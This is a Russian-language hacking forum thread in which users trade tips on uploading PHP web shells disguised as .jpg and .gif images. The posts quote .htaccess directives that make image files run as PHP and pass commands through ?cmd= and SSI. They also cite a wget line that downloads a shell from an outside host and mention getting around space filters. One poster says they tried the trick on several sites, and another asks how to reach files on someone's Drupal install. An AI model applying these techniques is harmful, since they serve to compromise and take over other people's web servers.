 |
|
11.02.2015, 18:08
|
|
Новичок
Регистрация: 28.10.2010
Сообщений: 6
С нами:
8178806
Репутация:
0
|
|
Сообщение от C6H5CH3
Может у тебя просто в .htaccess PHP отключен в каталоге с картинками или не прописано там расширение?
Из той же статьи:
Создаём файлик .htaccess, и вписываем в него следующее:
PHP код:
AddType application/x-httpd-php .jpg
AddHandler application/x-httpd-php .jpg
Сохраним.. там, где .jpg можете указать любой понравившийся вам формат, хоть .hacker
вопрос только как создать/залить такой .htaccess
|
|
|
11.02.2015, 18:19
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от yaskin
вопрос только как создать/залить такой .htaccess
в чем, конкретно, проблема? объясните всю ситуацию
|
|
|
|
07.04.2015, 22:34
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от Osstudio
↑
Также бывает, что если мы создадим файл file.shtm?cmd=... то в большинстве случаев скрипт не хотел выполнять системные команды, которые содержат пробел. т.е. "id" он выполнял, "ls" - тоже, а "uname -a" - нет, потому что содержит пробел. Таким образом все фишки типа "wget
http://shell.com/shell.php
" обламывались. Но не отчаиваетесь - выход есть:
Можно написать и скомпилировать програмку, которая выполняет системную команду скачивания шелла (через wget). скомпилировать, и залить её. Потом через SSI скрипт просто напросто выполнить её.
$IFS defaults to whitespace (space, tab, and newline), but may be changed, for example, to parse a comma-separated data file. Note that $* uses the first character held in $IFS.
|
|
|
|
14.08.2015, 14:06
|
|
Новичок
Регистрация: 11.08.2015
Сообщений: 28
С нами:
5661686
Репутация:
0
|
|
Уже на нескольких сайтах перепробовал, везде при запросе
Код:
http://сайт/картинка.gif?cmd=phpinfo();
открывается просто картинка. В чем может быть причина?
|
|
|
|
14.08.2015, 22:50
|
|
Участник форума
Регистрация: 29.05.2015
Сообщений: 110
С нами:
5768246
Репутация:
0
|
|
Сделай .gif исполняемую как .php в .htaccess
|
|
|
|
25.10.2015, 17:27
|
|
Новичок
Регистрация: 14.10.2015
Сообщений: 10
С нами:
5569526
Репутация:
0
|
|
А может подскажите как получить доступ к файлам если установлен Drupal 7.34, нет доступа к mysql, есть доступ к админке под юзером, где нет возможности не загрузить ни картинку ни модуль..
|
|
|
|
27.10.2016, 09:59
|
|
Новичок
Регистрация: 07.09.2009
Сообщений: 1
С нами:
8777319
Репутация:
0
|
|
Хорошая статья - а чего ТС в бане?
только хотел плюсануть ...
|
|
|
|
05.03.2020, 01:08
|
|
Новичок
Регистрация: 18.09.2016
Сообщений: 1
С нами:
5079926
Репутация:
0
|
|
Залит файл .htaccess, содержимое следующее:
Код:
AddType application/x-httpd-php .jpg .gif
AddHandler application/x-httpd-php .jpg .gif
AddType application/x-httpd-php .jpg .gif
SetHandler application/x-httpd-php
img.jpg (внутри обычный код шелла 96kb)
> Изображение "img.jpg" не может быть показано, так как содержит ошибки.
img2_exif.jpg?cmd=phpinfo(); [ Внутри комментарий ]
> Открывается обычная картинка, больше ничего не происходит.
img.gif?cmd=phpinfo(); [ Внутри комментарий ]
> Открывается обычная картинка 1px, больше ничего не происходит.
Тестирую на своём хостинге, если же просто залить img.php с содержимым:
И перейти по img.php?cmd=phpinfo(); [ Всё отлично работает, пробовал разный код, плюсами выделил с которыми всё работает ]
Характеристики: PHP Version 5.6.36 / Apache 2.2.15 (CentOS)
Куда копать и почему не работает?
Браузеры разные пробовал, думал дело в них... |
|
|
|
07.03.2020, 15:29
|
|
Новичок
Регистрация: 30.01.2019
Сообщений: 15
С нами:
3835766
Репутация:
3
|
|
Сообщение от putinrub
↑
Залит файл
.htaccess
, содержимое следующее:
Код:
AddType application/x-httpd-php .jpg .gif
AddHandler application/x-httpd-php .jpg .gif
AddType application/x-httpd-php .jpg .gif
SetHandler application/x-httpd-php
img.jpg
(внутри обычный код шелла 96kb)
> Изображение "img.jpg" не может быть показано, так как содержит ошибки.
img2_exif.jpg
?cmd=phpinfo(); [ Внутри комментарий ]
> Открывается обычная картинка, больше ничего не происходит.
img.gif
?cmd=phpinfo(); [ Внутри комментарий ]
> Открывается обычная картинка 1px, больше ничего не происходит.
Тестирую на своём хостинге, если же просто залить
img.php
с содержимым:
И перейти по
img.php
?cmd=phpinfo(); [ Всё отлично работает, пробовал разный код, плюсами выделил с которыми всё работает ]
Характеристики: PHP Version 5.6.36 / Apache 2.2.15 (CentOS)
Куда копать и почему не работает?
Браузеры разные пробовал, думал дело в них...
Решили вопрос?
Если нет, то посмотреть вывод phpinfo() надо.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
